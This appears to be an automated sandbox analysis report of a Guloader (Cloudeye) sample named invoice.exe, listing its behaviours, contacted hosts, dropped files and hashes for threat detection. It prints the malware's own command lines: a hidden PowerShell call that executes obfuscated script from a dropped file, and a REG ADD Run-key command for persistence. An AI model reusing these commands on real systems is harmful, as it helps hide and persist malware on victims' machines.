Analysis Overview
SHA256
2926ff4aaaf732eb191704ec4b0b5081c9046b1a08ccf3871b14e7600e07d34c
Threat Level: Known bad
The file invoice.exe was found to be: Known bad.
Malicious Activity Summary
Guloader, Cloudeye
Command and Scripting Interpreter: PowerShell
Loads dropped DLL
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Suspicious use of NtCreateThreadExHideFromDebugger
Unsigned PE
Enumerates physical storage devices
NSIS installer
Suspicious behavior: MapViewOfSection
Modifies registry key
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
| Field | Value |
|---|---|
| Reported | 2024-07-09 11:28 |
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NSIS installer
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
| Field | Value |
|---|---|
| Submitted | 2024-07-09 11:28 |
| Reported | 2024-07-09 11:34 |
| Platform | win7-20240705-en |
| Max time kernel | 316s |
| Max time network | 317s |
| Command Line | |
Signatures
Guloader, Cloudeye
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\invoice.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\invoice.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\invoice.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Observerbare86.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Windows\CurrentVersion\Run\Udmund = "%Internality% -windowstyle minimized $Skibsfart=(Get-ItemProperty -Path 'HKCU:\\Backlash\\').Preseparated;%Internality% ($Skibsfart)" | C:\Windows\SysWOW64\reg.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Observerbare86.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Observerbare86.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Observerbare86.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 2320 set thread context of 1988 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\Observerbare86.exe |
Enumerates physical storage devices
NSIS installer
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\invoice.exe
"C:\Users\Admin\AppData\Local\Temp\invoice.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle hidden "$Udlbstidspunkter=Get-Content 'C:\Users\Admin\AppData\Local\Temp\Servicebureauet\aloe\collinsia\Handelsstandsforeningernes.Toi';$Subdelegate=$Udlbstidspunkter.SubString(69683,3);.$Subdelegate($Udlbstidspunkter)"
C:\Users\Admin\AppData\Local\Temp\Observerbare86.exe
"C:\Users\Admin\AppData\Local\Temp\Observerbare86.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udmund" /t REG_EXPAND_SZ /d "%Internality% -windowstyle minimized $Skibsfart=(Get-ItemProperty -Path 'HKCU:\Backlash\').Preseparated;%Internality% ($Skibsfart)"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udmund" /t REG_EXPAND_SZ /d "%Internality% -windowstyle minimized $Skibsfart=(Get-ItemProperty -Path 'HKCU:\Backlash\').Preseparated;%Internality% ($Skibsfart)"
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 216.58.201.99:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 216.58.201.99:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
Files
C:\Users\Admin\Desktop\Flyverdragter.lnk
| Hash | Value |
|---|---|
| MD5 | e1f9e012d6a177b9fdb259de551c2db4 |
| SHA1 | 65609a0c4740e3ccc5f5510b55c9006c576840ac |
| SHA256 | 6463f0514d8119de8e60b44bdabe90004c2399ace020d426becbf427a6144a0c |
| SHA512 | a222d0b78e80d9402ebf1560e5fb5995f3a3d674c7144a5494cf7fa3352654c9d187a522587208e903c06fcf3de404e3e8fc31ffed92fa0c4aa749586a63f668 |
\Users\Admin\AppData\Local\Temp\nsj5024.tmp\nsExec.dll
| Hash | Value |
|---|---|
| MD5 | b648c78981c02c434d6a04d4422a6198 |
| SHA1 | 74d99eed1eae76c7f43454c01cdb7030e5772fc2 |
| SHA256 | 3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9 |
| SHA512 | 219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2 |
\Users\Admin\AppData\Local\Temp\nsj5024.tmp\BgImage.dll
| Hash | Value |
|---|---|
| MD5 | 350a507070ed063ac6a511aeef67861a |
| SHA1 | cf647b90a1212e090f1d236d1b50a5010cbf3bae |
| SHA256 | 5c66abd3f06eaa357ed9663224c927cf7120dca010572103faa88832bb31c5ab |
| SHA512 | cde5747cc8539625e4262afad9699ce4e8325133d7ed7f47b9d46989a7aa0d2cc2488441acc57368f485ef1dd3e02b9ef2faa642f68e9f1db53a39e0f896d468 |
\Users\Admin\AppData\Local\Temp\nsj5024.tmp\nsDialogs.dll
| Hash | Value |
|---|---|
| MD5 | 13b6a88cf284d0f45619e76191e2b995 |
| SHA1 | 09ebb0eb4b1dca73d354368414906fc5ad667e06 |
| SHA256 | cb958e21c3935ef7697a2f14d64cae0f9264c91a92d2deeb821ba58852dac911 |
| SHA512 | 2aeeae709d759e34592d8a06c90e58aa747e14d54be95fb133994fdcebb1bdc8bc5d82782d0c8c3cdfd35c7bea5d7105379d3c3a25377a8c958c7b2555b1209e |
memory/2320-181-0x0000000073881000-0x0000000073882000-memory.dmp
memory/2320-182-0x0000000073880000-0x0000000073E2B000-memory.dmp
memory/2320-185-0x0000000073880000-0x0000000073E2B000-memory.dmp
memory/2320-184-0x0000000073880000-0x0000000073E2B000-memory.dmp
memory/2320-183-0x0000000073880000-0x0000000073E2B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Servicebureauet\aloe\collinsia\Handelsstandsforeningernes.Toi
| Hash | Value |
|---|---|
| MD5 | 9f369129a14ef6d8d0867ec4d9b6eb19 |
| SHA1 | 2a56ca0fb0b4590c030d293a7829ac087212821b |
| SHA256 | 9f288ab07bf267422b4670dfd87f373115682a026e63db13e9bab44977c8cc0f |
| SHA512 | d8fd8aeabfa1bd47f0d3ca2208ac9154496d9b38ef6b185a3c9bf26877539f57a5b0e022c02ae2121a68f74ab13f45f446124dc6d8d90020defd1abeb2825326 |
memory/2320-188-0x0000000073880000-0x0000000073E2B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Servicebureauet\aloe\collinsia\Typehuses.Ver
| Hash | Value |
|---|---|
| MD5 | edd82166d9af4f94ca8413254ad27eee |
| SHA1 | cbe26db0839f63fc825205293f32660e8fa4b63c |
| SHA256 | b1246b2938bd2fa73f3a6679ea5040697db9a6ace3607fd2f20c5db2eeecc907 |
| SHA512 | 7f25fac516c23cdddfbf8f22e3f29e23c599ceacdfcf5d84531535e7838114bc982bef629ab219c7a17bcbc9ac97f159642297da7e2c1d8fa8d921917986fae8 |
memory/2320-190-0x0000000073880000-0x0000000073E2B000-memory.dmp
memory/2320-191-0x0000000006610000-0x000000000751B000-memory.dmp
\Users\Admin\AppData\Local\Temp\Observerbare86.exe
| Hash | Value |
|---|---|
| MD5 | 5cb973edda7244515c1ddf1f532b67bc |
| SHA1 | e03200f1949f4c85379cb31d2d61165794efb481 |
| SHA256 | 2926ff4aaaf732eb191704ec4b0b5081c9046b1a08ccf3871b14e7600e07d34c |
| SHA512 | 220f5d5b8677de13495525bc825e048f25dbd9fe829f37e31a64f5ee72cf62945a1d71456a4438f96cd58496289f3cbccb2d7a3ee7fbe1c75e0ee15c93bad9ed |
memory/2320-196-0x0000000073880000-0x0000000073E2B000-memory.dmp
memory/1988-197-0x0000000000450000-0x00000000014B2000-memory.dmp
memory/1988-219-0x00000000014C0000-0x00000000023CB000-memory.dmp